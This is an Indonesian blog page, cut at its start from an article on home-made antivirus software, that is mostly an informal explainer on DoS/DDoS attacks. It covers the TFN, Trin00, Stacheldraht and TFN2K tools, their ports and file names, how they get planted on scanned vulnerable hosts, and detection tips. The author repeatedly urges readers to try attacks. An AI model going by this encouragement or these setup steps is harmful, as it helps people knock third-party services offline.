bisa membuatnya sendiri dengan fitur-fitur yang tak kalah bagusnya. Memang terdapat ketidaksempurnaan
dalam AV buatan sendiri ini, tetapi setidaknya dapat dijadikan pencegah dari infeksi virus komputer
yang semakin merajalela. Software AV sederhana ini dilengkapi oleh engine scanner statis dan
database definisi. Tidak tertutup kemungkinan software AV ini ditingkatkan lebih advanced dalam hal
engine scannernya.

Penutup#
Pengembangan software AV sederhana ini sepenuhnya Open-Source selama mengikutsertakan nama pembuat
asli didalamnya. Listing serta projek lengkap dapat didownload di
http://www.geocities.com/emomelodicfreak/ProjekAV.zip



Denial of Service(DOS

1.Apakah itu DDOS ?
2.Definisi Denial of Service Attacks
3.Distributed Denial of Service (DDOS) Attacks.
4.Mengapa Serangan DDOS menjadi sangat populer ?
5.Efek dari serangan DDOS
6.Teknikal overview dari aplikasi DDOS

Apakah itu DDOS ?
Sampai dengan sekarang ini pengertian tetang DDOS adalah seperti yang anda dengarkan beberapa waktu yang lalu mengenai serangan terhadap web site Yahoo! MSN, CNN, Buy.com, eBay dan Amazon.com. Informasi terkini yang didapat kan adalah bahwa serangan hacker itu berasal dari West Coast, United States (Oregon dan California). Dari laporan FBI menuliskan bahwa serangan ini melibatkan beberapa network dari universitas yang ada di daerah tersebut yaitu Stanford, state California dan Santa. Barbara. Pada whitepaper ini akan dibahas sekilas mengenai cara serangan para hacker tersebut ke beberapa web site yang disebutkan di atas.

Definisi Denial of Service Attacks
Serangan Denial of Service(DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood nya.

Serangan seperti ini juga dapat menghancurkan seluruh host dengan mengakibatkan “kernel panic” pada Linux dan keluarga UNIX lainnya atau lebih umumnya the “blue screen on death” nya Windows NT dan 98.
Serangan DOS ini dapat ditujukan dengan lebih spesifik terhadap services yang ada, contohnya seperti host Web Server dan fungsi dari Network Interface Card (NIC).

Bahkan yang lebih menyenangkan lagi si penyerang menargetkan serangan khusus pada network environment seperti network bandwith dengan menciptakan network request imitasi sehingga terjadi network bussy atau istilah yang lebih familiarnya bottleneck (yang pasti bandwith networknya menjadi full of waste ). Seperti anda ketahui bahwa bandwith adalah bagian yang sangat esensial dari koneksi internet (saluran ke internet). Dengan memenuhi saluran tersebut dengan infomasi sampah(network request imitasi) si penyerang dapat dengan bebas menguasai network bandwith yang masih available. Serangan DOS terakhir yang terjadi adalah pada tgl 7 January 2000.

Serangan DOS ini telah ada pada tahun 1988 yaitu Robert Moris Internet Worm, Melissa virus yang terkenal pada tahun dan masih banyak lagi kejadian DOS pada network dan perusahaan yang tidak diketahui.
Meskipun hal-hal ini disebabkan oleh worm, virusdan beberapa macam dari program yang ada, semua ini terjadi dengan cara yang sama yaitu : satu host menyampaikan informasi atau berkomunikasi dengan host lainnya dan kemudian secara efektif menghancurkan korban dengan mengirim segudang informasi yang tidak dapat di tanggani oleh korban itu sendiri.

Serangan Distributed Denial of Service (DDOS).
Perlu digariskan disini bahwa DOS dan DDOS adalah beda. DOS adalah serangan hanya dengan satu node sedangkan DDOS yaitu dengan beberapa node. Pada tahun 1998 kemajuan dari DOS yang tradisional terlihat dari 3 konsep baru serangan yaitu :
Serangan dengan melalui beberapa host.
Serangan dengan koordinasi diantara banyak individu yang ada (member dari pemakai network=internet)
Serangan dengan menggunakan distribusi system dimana hal ini untuk mencoba membuat bingung jalan menuju ke titik pusat serangan.

Si penyerang (titik pusat) menyerang host yang ada. Host tersebut tidak berkomunikasi secara langsung dengan korban. Host tersebut adalah administrator yang mengontrol dalam network mereka sendiri yang terdiri dari “Master” dan “Daemon”.Si penyerang dapat mengontrol/menguasai satu atau bahkan lebih node master tersebut. Master node secara umum akan mengontrol beberapa bahkan lusinan node daemon, yang kemudian akan di alamatkan ke targer/korban.Maka serangan yang dihasilkan akan berupa “packet storm” yang dapat menghancurkan host atau bandwith dari network tersebut.

Keuntungan dan perspektif sebagai hacker dengan menggunakan serangan DDOS yang dapat dilihat disini adalah :
Si Penyerang dapat menggunakan ratusan system untuk menghancurkan korban.
Serangan tersebut menghasilkan kiriman “packet” yang sangat besar dan dengan cepat dapat menghancurkan korban(target host).

Jika network atau host dapat diatur/dimanage dengan sukses dengan serangan ini, maka dapat anda bayangkan betapa besar koneksi yang digunakan oleh sebuah network dapat dihancurkan dengan serangan DDOS ini. Jadi semakin besar suatu jaringan maka akan semakin besar pula serangan yang ada(menyenangkan bukan ?).

Contoh kasus dapat anda lihat yaitu Yahoo! Dan eBay, perusahaan seperti ini menggunakan kompleks server yang disebut sebagai “cluster servers” dimana mereka bertujuan dengan memberikan service yang OK kepada pelanggan(bandwith yang OK dalam hal ini).Jadi dapat dilihat disini bahwa system yang “robust”(seperti banyak tertulis dalam produk Microsoft) dan system yang “well-managed” pun dapat dengan mudah dihancurkan dengan system serangan seperti ini. (tertarik anda untuk mencoba ?)Tidak hanya programming kita dapat menggunakan multi tier desain tapi dalam hacking pun ada desainnya. Dalam struktur multi tier ini korban akan sangat sulit melacak titik pusat dari serangan tersebut.
Sejauh ini sangat penting untuk dimegerti bahwa sebagian besar dari operator dari host dimana master dan daemon itu berada merupakan bagian pendukung dari DOS ini. Hal ini terjadi karena hacker telah berhubungan dengan master dan daemon node dimana mereka telah menginstall software DOS ini tanpa sepengetahuan pemilik host/administrator/operatornya. Seandainya si korban dapat melacak daemon host sekalipun, pemilik/operator dari host tsb tidak dapat memberikan informasi yang cukup untuk meneruskan upaya ini.

Mengapa Serangan DDOS menjadi sangat populer ?
Beberapa jawabannya dapat anda lihat dibawah ini :
Banyak Operating System dan aplikasi yang memberikan kemudahan dalam instalasi sehingga memberikan beberapa keuntungan seperti menghemat waktu mempelajarinya dan bahkan tidak perlu seorang ahli IT dalam mengoperasikannya. Maka akan sangat sulit bagi mereka untuk memberikan sekuriti kepada system yang mereka install secara otomatis tsb. Bukankah lebih mudah menginstall suatu program atau aplikasi dengan menggunakan default setting yang sudah ada. Contohnya dapat anda lihat pada system BII dan Bank Bali(segera di publish) di site Jasakom.
Banyak dari network environment bernasis pada single operating system. Contohnya jika menggunakan NT semuanya atau Linux di seluruh network environment. Router Cisco, dimana secara merata cara setting nya adalah sama di semua tempat.Arsitektur internet yang alami secara mendasar memang sangat tidak secure dan memerlukan lingkungan kerja yang complex, mahal dan banyak menghabiskan waktu.
Software yang semakin komplex. Kompleks dalam hal ini adalah mengenai source code sehingga hole-hole yang ada dapat di exploit oleh hacker. Contohnya saja seperti Microsoft yang banyak service packnya itu. Software yang ada semakin powerful. Dimana software-software yang ada dapat diakses tanpa harus dengan pengetahuan yang terlalu luas.
Kemajuan internet telah membawa banyak user yang tidak berpengalaman ikut serta dalam lingkungan networking sehingga akan lebih mudah bagi mereka untuk “misconfigured” system daripada memberikan keuntungan bagi system tsb. Serangannya sulit dilacak.
karena perlu waktu yang berhari-hari bahkan bulanan sehingga si penyerang sudah relatif lepas hari kesalahan yang ada.

5. Efek dari serangan DDOS
Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti in hanya merupakan gangguan yang memerlukan restart system. Tetapi bagaimanapun juga hal seperti ini akan menggangu bisnis yang sedang dijalankan apalagi bisnis yang sangat tergantung kepada system di internet.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai tujuannya yang telah ditargetkan. Jadi hacker tsb tidak hanya iseng mengadakan serangan DOS ini.
Contohnya adalah jika hacker tsb ingin menyerang Host B maka ia harus menggunakan computer A sebagai alat utk membingungkan korban dalam tracking si penyerang. Dan host A harus mempunyai trust relationship ke host B.
Tehnikal overview dari aplikasi DDOS
Berikut ini akan dibahas secara tehnikal software yang digunakan untuk melancarkan serangan DDOS ini. Mungkin pembahasan ini dapat digunakan sebagai bahan dalam memproteksi diri.
Disini kami hanya membahas 4 macam software dari yang sangat banyak di underground (swing-swing terbang oiii ) maaf jika anda berpikir saya terlalu berfantasi (I am TheDreamer)

§ The Tribal Flood Network (TFN)
TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood connection dengan menggunakan protocol yang ada pada TCP/IP :
UDP : difokuskan pada domain name system dan network management program.
TCP : pusat e-mail dan web transaksi
ICMP : digunakan oleh para professional untuk troubleshooting network
Nama program masternya adalah : tribe.c dan program daemon bernama td.c

§ Trin00
Software ini menggunakan UDP untuk mengirimkan flood packets network dengan menggunakan UDP. Port yang digunakan adalah :
Attack to Master : TCP Port 27665
Master to Daemon : UDP Port 27444
Daemon to Master(s) : UDP Port 31335
Program master : master.c
Program Daemon : ns.c
Sebagai saran, program ini tidak bagus untuk digunakan karena master dan daemon berhubungan dengan clear text.

§ Stacheldraht
Program ini cukup ok dan masih baru lho. Nama program ini dalam bahasa Jerman yang berarti “Barb Wire” kenal kan dengan film Barb Wire si Pamela Anderson (Big Tit women). Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup bahaya tapi keren banget.
Port TCP : 16660 dan 60001
Master program bernama : mserv.c
Daemon program bernama : td.c
Program ini memiliki client yang juga sebagai telnet : client.c
Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.

§ TFN2K
Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.
Software DDOS lainnya yang dapat saya sebutkan disini adalah paket seperti bliznet, dscan dan saltine cracker. Dscan adalah software yang dapat scanning distribusi operating system dan cukup sulit untuk di lacak dalam penggunaannya. Sedangkan yang lebih keren lagi adalah saltine cracker suite yang dapat menembus password untuk site-site yang perlu authentication.
Dari ke-4 software di atas yang disebutkan kecuali Stacheldraht setiap software di atas memiliki aplikasi master dan daemon seperti yang telah dibahas sebelumnya diatas.
Sedangkan Stacheldraht memiliki client yang hampir sama dengan telnet. Dimana hacker dapat mengontrol ratusan PC hanya dengan component dari software tsb. Cara kerja dari component ini adalah seperti membuat cabang ke client software(cthnya seperti Windows 98 yang sudah memiliki Telnet client sendiri), jadi hacker dapat mengontrol master dan client.
Hal-hal dan sifat-sifat yang menarik dari kesamaan ke –4 software di atas adalah sbb :

Mudah di instalasi dan di gunakan.(Buruan deh dicoba) Tidak mudah dilacak jika digunakan, seperti pesawat hantu USA “Stealth” yang tidak dapat di deteksi oleh radar.Selain dari TFN2K, software lainnya tsb bekerja pada system UNIX. Aslinya software tsb di compiled untuk system Solaris tetapi sekarang telah ada yang dibuat untuk platform lainnya seperti Linux dan Windows NT.
Master dan Daemon selalu diproteksi dengan password.Pada Master component list dapat di daftarkan dengan mudah daemon yang ingin ditambahkan ke dalamnya.
Setiap DDOS aplikasi memiliki sign tersendiri, sehingga akan adanya kemungkinan untuk mendefinisikan master atau daemon yang telah diinstall di komputer anda.

Bagaimana menginstalasi program DDOS
Untuk menginstalasi program DDOS ini, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security adalah dengan cara yang sangat mudah. Gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Satu hal yang cukup menarik adalah software client tsb dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan.Hal ini dikarenakan dapat ditrace dengan mudah host yang menyerangnya.

Deteksi terhadap keberadaan installasi DDOS software
Dalam hal ini belum ditemukan tools yang paling OK dalam mendeteksi program DDOS ini.
Hal ini karena program DDOS masih menggunanakan system client-server yang masih tradisional. Program tsb menggunakan port tertentu pada saat aktif sehingga untuk dapat mencegah hal ini maka anda hanya dapat mencari port yang open untuk di closed dengan menggunakan perintah netstat.Anda juga dapat menggunakan perintah find / -name client, tetapi tentu saja anda sudah tahu program client yang diinstall pada komputer anda.Banyak dari program DDOS lebih banyak menggunakan fasilitas crontab UNIX yang secara automatic menjalankan aplikasi. Dalam hal seperti ini maka perlu check crontab apakah ada file yang termasuk dalam file-file yang perlu dicurigai sebagai client dari program DDOS ini.
Program yang dapat dipakai untuk mendeteksi program DDOS ini adalah
RID yang ditulis oleh si hacker Mixter (pembuat TFN dan TFN2K), anda dapat mencarinya di internet dengan mudah.Sickenscan yang dapat mendeteksi password default dari program Stacheldraht.Trin00killer adalah untuk me-remove program trin00 master dan daemonnya.

asbag © 2008 Template by Dicas Blogger.

TOPO